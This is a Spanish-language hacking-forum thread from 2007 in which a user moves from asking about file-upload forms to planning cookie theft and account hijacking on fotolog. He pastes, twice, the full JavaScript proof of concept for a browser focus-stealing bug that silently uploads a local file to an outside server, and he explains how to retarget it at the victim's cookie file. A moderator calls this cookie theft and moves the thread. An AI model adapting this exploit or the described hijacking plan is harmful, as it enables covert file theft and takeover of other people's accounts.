elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 08:58  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Duda...como crear forms para updatar archivos a un server		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda...como crear forms para updatar archivos a un server  (Leído 2,143 veces)
Fhaker - TiToX

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Duda...como crear forms para updatar archivos a un server
« en: 29 Octubre 2007, 23:29 »
bueno simplemente eso....

como crear forms para updatar archivos a un server¿?¿?

agredesco desde ya la info q me puedan dar...incluos las respuestas de q esto ya se pregunto antes y de que hay temas al respecto...
En línea
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.083


Mtz De C.


Ver Perfil WWW
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #1 en: 30 Octubre 2007, 04:59 »
Cita de: Fhaker - TiToX en 29 Octubre 2007, 23:29
bueno simplemente eso....

como crear forms para updatar archivos a un server¿?¿?

agredesco desde ya la info q me puedan dar...incluos las respuestas de q esto ya se pregunto antes y de que hay temas al respecto...

¿Tienes idea de algún código dinámico de server?, sino busca info al respecto.

Suerte
En línea


Con sangre andaluza :)
Fhaker - TiToX

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #2 en: 30 Octubre 2007, 11:27 »
vos te referis a php??...codigo ejecutado del lado del server...

se algo de php... pero no sabia q lo q yo busco se podia hacer con php, pense q era con javascript
En línea
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.083


Mtz De C.


Ver Perfil WWW
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #3 en: 30 Octubre 2007, 14:23 »
Cita de: Fhaker - TiToX en 30 Octubre 2007, 11:27
vos te referis a php??...codigo ejecutado del lado del server...

se algo de php... pero no sabia q lo q yo busco se podia hacer con php, pense q era con javascript

No amigo, js no puede interactuar con el servidor. Si ya sabes PHP siguete por ahí y busca info de uploads en PHP ($_FILES), es fácil  ;)

Suerte
En línea


Con sangre andaluza :)
ÂìmBòt

Desconectado Desconectado

Mensajes: 152


Wanna Be -Hacker-


Ver Perfil
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #4 en: 31 Octubre 2007, 00:58 »
mira,, form por lo que se es de html, y sirve para,, hacer formularios y lo que podes hacer es un formulario para examinar archivos pero necesiitas implementar Php para poder subir archivos con Php la verdad que no tengo nivel para pasarte el code pero,, En html no se puede hacer solamente se puede hacer la parte de examinar si keres subir archivos usa Php,,
En línea
Fhaker - TiToX

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #5 en: 31 Octubre 2007, 18:17 »
si bueno muchas gracias ya lo logre :p...era una boludes :p...

pero la cosa es q no pude agregarle un vale al input de tipo file...cosa de q aparezca algo escrito ya en el input :P...

xo no aparece, prove incluso con JS para q se escriba cuando pase un evento y no se puede...

alguien sabe pq es esto??? o la solucion¿??

...yo creo q conozco la causa, es pq sino cualkiera t podria hacer entrar a una web y haciendo apretar un boton subir archivos sin permisos del user -.-
En línea
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.083


Mtz De C.


Ver Perfil WWW
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #6 en: 1 Noviembre 2007, 04:52 »
Citar
si bueno muchas gracias ya lo logre :p...era una boludes :p...

pero la cosa es q no pude agregarle un vale al input de tipo file...cosa de q aparezca algo escrito ya en el input tongue...

Eso no se puede  :P

Trata con js, pon un getelementbyid y le asignas el value mediante el evento onload  :P
En línea


Con sangre andaluza :)
Fhaker - TiToX

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #7 en: 2 Noviembre 2007, 01:40 »
bueno...buscando informacion encontre q hay una vulnerabilidad de browsers, q afecta a IExplorer y a FFox, se llama File Focus Stealing, y tamb hay un Exploit publicado, dicho Exploit esta escrito en JS y lo q hace es subir tu archivo boot.ini a el server sin q el usuario de la web ponga nada con respecto a eso.

se podria usar para robar cookies de users de cualkier web...un caso interesante, q ya he investigado un poco seria el de www.fotolog.com...robarimos el archivo "nombredepc"@fotolog.com.txt q esta en la carpeta cookies dentro de documents and settings, en la carpeta del user de windows q esta conectado en ese momento...con un poco de ingenieria social, haciendo entrar a una supuesta victima a la web maliciosa, estando obviamente (la victima) conectada con su cuenta de fotolog (para q se carge la cookie).

Despues nos creamos una cuenta de fotolog, no logeamos y editamos el value de nuetra cookie llamada "LEC" (q es la q "te da" el user en esa web), y la cambiamos por el valor de la cookie robada, actualizamos la pagina y estamos logeados con su cuenta....


El problema es q dicho Exploit mencionado arriva, esta escrito en javascript, y la verdad es q no se mucho del tema....obviamente me doy cuenta mas o menos como funciona al leer un codigo de fuente de JS pq soy programador de otros lenguajes y son maaaas o menos todos parecidos....logre hacer q el script intente subir un archivo de prueva "e:\a.txt", modificando el valor de una cadena de variables, pero este exploit desde la instruccion "action" del form con el input tipo file llama a un cgi en su servidor q no es php....la extensión es ".cgi"...no se como trabaja ni nada...y no he podido hacer funcionar esto con un programa php
En línea
Fhaker - TiToX

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #8 en: 2 Noviembre 2007, 01:45 »
aca esta el codigo de fuente del explot en html y por supuesto con codigo javascript


lo estraje de la web: http://lcamtuf.coredump.cx/focusbug/ieversion.html

para cambiar el archivo q kieren enviar ...debe cambiar esta linea:
"var needed = [ 'i', 'n', 'i', '.', 't', 'o', 'o', 'b', '\\' ];"
como podran notar si leen las varibales al reves veran q se forma la caadena "boot.ini"

el problema me surge aca:<form action="http://lcamtuf.coredump.cx/focusbug/showpay.cgi"

<html>
<head>
<title>MSIE7 focus bug (lcamtuf@coredump.cx)</title>
</head>
<body style="overflow: hidden" onload="init()">
<script>
var curat = 0;
var needed = [ 'i', 'n', 'i', '.', 't', 'o', 'o', 'b', '\\' ];
var entered = '';

function divert_focus() {
  var cc = window.event.keyCode;
  var key = String.fromCharCode(cc);
  if (key.toLowerCase() != needed[curat]) {
    document.getElementById("foo3").focus();
    setTimeout('restore_focus()',10);
  } else {
    document.getElementById("foo2").focus();
    setTimeout('append_char()',10);
  }
  return 0;
}

function restore_focus() {
  document.getElementById("foo2").focus();
  entered = entered + document.getElementById("foo3").value.charAt(0);
  document.getElementById("foo1").value = entered;
}

function append_char() {
  entered = entered + document.getElementById("foo2").value.charAt(0);
  document.getElementById("foo1").value = entered;
  if (++curat == 9 ) document.getElementById("foo4").click();
}

function init() {
  document.getElementById("foo2").focus();
  setTimeout('spoof_cursor()',300);
  setTimeout('defocus()',500);
}


var show_cur = 0;

function spoof_cursor() {
  document.getElementById("foo1").value = entered + (show_cur ? '|' : '');
  show_cur = !show_cur;
  setTimeout('spoof_cursor()',300);
}

function defocus() {
  document.getElementById("foo2").focus();
  setTimeout('defocus()',500);
  document.getElementById('pdiv').innerHTML = document.getElementById('foo2').value;
}

</script>

<form action="http://lcamtuf.coredump.cx/focusbug/showpay.cgi" method=post enctype="multipart/form-data" style="position: absolute; left: -500px; width: 2000px; height: 100%">
<div style="position: absolute; left: 510px; top: 0px">
<font face="arial" size="-1">
<font size="+1" color="purple"><b>MSIE7 focus bug demonstration (for Windows)</b></font>
<hr size="1">
<li> <font color="teal"><i>This demonstrates a newly discovered vulnerability in MSIE7, by <a href="mailto:lcamtuf@coredump.cx">Michal Zalewski</a></i></font>

<li> For Firefox version of this attack, <a href="ffversion.html">click here</a>.
<li> For a clarification on BUGTRAQ / Full-Disclosure mess, <a href="description.txt">see this summary</a>.
<p>
<b>Compose your message here:</b><br>
<textarea type=text id="foo1" style="font-family: arial" cols="70" rows="10" name=foo1></textarea>
<p>
<font color="black">Manually type the following text: "<b>I will never find a date. Thanks to computers and books :\</b>"

<br>
This should take you to a page showing a copy of your C:\BOOT.INI file.</font>
<P>
<font color="teal"><i>Naturally, this is just a naive example. The same code could be used
to divert keystrokes from web-based<br>games, weblog entry / comment forms, on-line chats,
captchas, etc. As such, this is be somewhat scary.</i></font>
<p>
<font color="gray">Preview of diverted keystrokes (demo only):
<font color="red"><b><div id='pdiv' style="border: 1px; border-style: solid; border-color: gray; width: 200px; text-align: center">&nbsp;</div></b></font></font>
</font>
</div>
<input id=foo2 style="position: absolute; left: 0px; top: 0px" type=file name=foo2 onkeypress="divert_focus()">
<input id=foo3 style="position: absolute; left: 0px; top: 100px" type=text>
<input type=submit id=foo4>
</form>

</body>
</html>




DESDE YA GRACIAS:::SI ALGUIEN PUEDE EXPLICAR QUE CALSE DE CGI ES ESE Y COMO FUNCIONA:::
« Última modificación: 2 Noviembre 2007, 01:48 por Fhaker - TiToX » En línea
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.083


Mtz De C.


Ver Perfil WWW
Re: Duda...como crear forms para updatar archivos a un server
« Respuesta #9 en: 2 Noviembre 2007, 01:50 »
Cita de: Fhaker - TiToX en  2 Noviembre 2007, 01:45
aca esta el codigo de fuente del explot en html y por supuesto con codigo javascript


lo estraje de la web: http://lcamtuf.coredump.cx/focusbug/ieversion.html

para cambiar el archivo q kieren enviar ...debe cambiar esta linea:
"var needed = [ 'i', 'n', 'i', '.', 't', 'o', 'o', 'b', '\\' ];"
como podran notar si leen las varibales al reves veran q se forma la caadena "boot.ini"

el problema me surge aca:<form action="http://lcamtuf.coredump.cx/focusbug/showpay.cgi"

<html>
<head>
<title>MSIE7 focus bug (lcamtuf@coredump.cx)</title>
</head>
<body style="overflow: hidden" onload="init()">
<script>
var curat = 0;
var needed = [ 'i', 'n', 'i', '.', 't', 'o', 'o', 'b', '\\' ];
var entered = '';

function divert_focus() {
  var cc = window.event.keyCode;
  var key = String.fromCharCode(cc);
  if (key.toLowerCase() != needed[curat]) {
    document.getElementById("foo3").focus();
    setTimeout('restore_focus()',10);
  } else {
    document.getElementById("foo2").focus();
    setTimeout('append_char()',10);
  }
  return 0;
}

function restore_focus() {
  document.getElementById("foo2").focus();
  entered = entered + document.getElementById("foo3").value.charAt(0);
  document.getElementById("foo1").value = entered;
}

function append_char() {
  entered = entered + document.getElementById("foo2").value.charAt(0);
  document.getElementById("foo1").value = entered;
  if (++curat == 9 ) document.getElementById("foo4").click();
}

function init() {
  document.getElementById("foo2").focus();
  setTimeout('spoof_cursor()',300);
  setTimeout('defocus()',500);
}


var show_cur = 0;

function spoof_cursor() {
  document.getElementById("foo1").value = entered + (show_cur ? '|' : '');
  show_cur = !show_cur;
  setTimeout('spoof_cursor()',300);
}

function defocus() {
  document.getElementById("foo2").focus();
  setTimeout('defocus()',500);
  document.getElementById('pdiv').innerHTML = document.getElementById('foo2').value;
}

</script>

<form action="http://lcamtuf.coredump.cx/focusbug/showpay.cgi" method=post enctype="multipart/form-data" style="position: absolute; left: -500px; width: 2000px; height: 100%">
<div style="position: absolute; left: 510px; top: 0px">
<font face="arial" size="-1">
<font size="+1" color="purple"><b>MSIE7 focus bug demonstration (for Windows)</b></font>
<hr size="1">
<li> <font color="teal"><i>This demonstrates a newly discovered vulnerability in MSIE7, by <a href="mailto:lcamtuf@coredump.cx">Michal Zalewski</a></i></font>

<li> For Firefox version of this attack, <a href="ffversion.html">click here</a>.
<li> For a clarification on BUGTRAQ / Full-Disclosure mess, <a href="description.txt">see this summary</a>.
<p>
<b>Compose your message here:</b><br>
<textarea type=text id="foo1" style="font-family: arial" cols="70" rows="10" name=foo1></textarea>
<p>
<font color="black">Manually type the following text: "<b>I will never find a date. Thanks to computers and books :\</b>"

<br>
This should take you to a page showing a copy of your C:\BOOT.INI file.</font>
<P>
<font color="teal"><i>Naturally, this is just a naive example. The same code could be used
to divert keystrokes from web-based<br>games, weblog entry / comment forms, on-line chats,
captchas, etc. As such, this is be somewhat scary.</i></font>
<p>
<font color="gray">Preview of diverted keystrokes (demo only):
<font color="red"><b><div id='pdiv' style="border: 1px; border-style: solid; border-color: gray; width: 200px; text-align: center">&nbsp;</div></b></font></font>
</font>
</div>
<input id=foo2 style="position: absolute; left: 0px; top: 0px" type=file name=foo2 onkeypress="divert_focus()">
<input id=foo3 style="position: absolute; left: 0px; top: 100px" type=text>
<input type=submit id=foo4>
</form>

</body>
</html>




DESDE YA GRACIAS:::SI ALGUIEN PUEDE EXPLICAR QUE CALSE DE CGI ES ESE Y COMO FUNCIONA:::
Cita de: Fhaker - TiToX en  2 Noviembre 2007, 01:40
bueno...buscando informacion encontre q hay una vulnerabilidad de browsers, q afecta a IExplorer y a FFox, se llama File Focus Stealing, y tamb hay un Exploit publicado, dicho Exploit esta escrito en JS y lo q hace es subir tu archivo boot.ini a el server sin q el usuario de la web ponga nada con respecto a eso.

se podria usar para robar cookies de users de cualkier web...un caso interesante, q ya he investigado un poco seria el de www.fotolog.com...robarimos el archivo "nombredepc"@fotolog.com.txt q esta en la carpeta cookies dentro de documents and settings, en la carpeta del user de windows q esta conectado en ese momento...con un poco de ingenieria social, haciendo entrar a una supuesta victima a la web maliciosa, estando obviamente (la victima) conectada con su cuenta de fotolog (para q se carge la cookie).

Despues nos creamos una cuenta de fotolog, no logeamos y editamos el value de nuetra cookie llamada "LEC" (q es la q "te da" el user en esa web), y la cambiamos por el valor de la cookie robada, actualizamos la pagina y estamos logeados con su cuenta....


El problema es q dicho Exploit mencionado arriva, esta escrito en javascript, y la verdad es q no se mucho del tema....obviamente me doy cuenta mas o menos como funciona al leer un codigo de fuente de JS pq soy programador de otros lenguajes y son maaaas o menos todos parecidos....logre hacer q el script intente subir un archivo de prueva "e:\a.txt", modificando el valor de una cadena de variables, pero este exploit desde la instruccion "action" del form con el input tipo file llama a un cgi en su servidor q no es php....la extensión es ".cgi"...no se como trabaja ni nada...y no he podido hacer funcionar esto con un programa php


Esto ya no es de aquí. Lo único que quieres es robar cookies =/

Lo muevo.
En línea


Con sangre andaluza :)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines